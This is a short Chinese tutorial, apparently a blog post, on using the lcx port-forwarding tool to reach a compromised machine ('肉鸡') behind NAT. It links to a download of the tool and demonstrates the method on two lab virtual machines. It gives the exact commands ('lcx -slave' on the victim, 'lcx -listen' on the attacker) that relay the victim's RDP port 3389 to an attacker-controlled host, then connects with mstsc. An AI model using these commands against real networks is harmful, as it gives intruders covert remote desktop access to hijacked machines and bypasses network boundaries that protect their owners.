内网中的主机一般都是使用私有IP,在网络出口处经过NAT转换为公网IP之后,才能访问Internet。在这种网络结构下,通信双方之间实现的是单向访问,即只有内网中的主机可以主动访问Internet中的主机,反之则不行。如果在内网中架设了一台服务器,又需要允许Internet中的用户访问这台服务器,那么就必须在网络出口处进行端口映射。
在网络***中,如果捕获了一台位于内网中的肉鸡,那么***是无法主动去连接这台肉鸡的,而且也不可能在人家的网络出口做端口映射,这时就可以用到lcx这个小工具了。下载地址:http://down.51cto.com/data/1878979

Lcx可以实现端口转发,将肉鸡A上的某个端口(如3389)转发到具有公网地址的主机B上,这样***只需连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有IP的限制。
下面在vmware中利用2台虚拟机来模拟操作,一台虚拟机作为***主机(IP地址192.168.80.128),另一台虚拟机作为肉鸡(IP地址192.168.80.129)。
首先将lcx分别放到这两台虚拟机的C盘根目录下,首先在肉鸡上执行命令“lcx –slave 192.168.80.128 5000 192.168.80.129 3389”,也就是将192.168.80.129上的3389端口转发到192.168.80.128上的5000端口。
然后再到***主机上执行命令“lcx –listen 5000 3389”,也就是在5000端口上监听,并将收到的数据转发到自己的3389端口上。此时在***主机上执行“netstat –an”命令,可以看到同时开放了5000和3389两个端口。
最后在***主机上打开mstsc,只需输入自己的IP地址(192.168.80.128或是127.0.0.1)便可以连接到肉鸡上了,从而实现内网突破。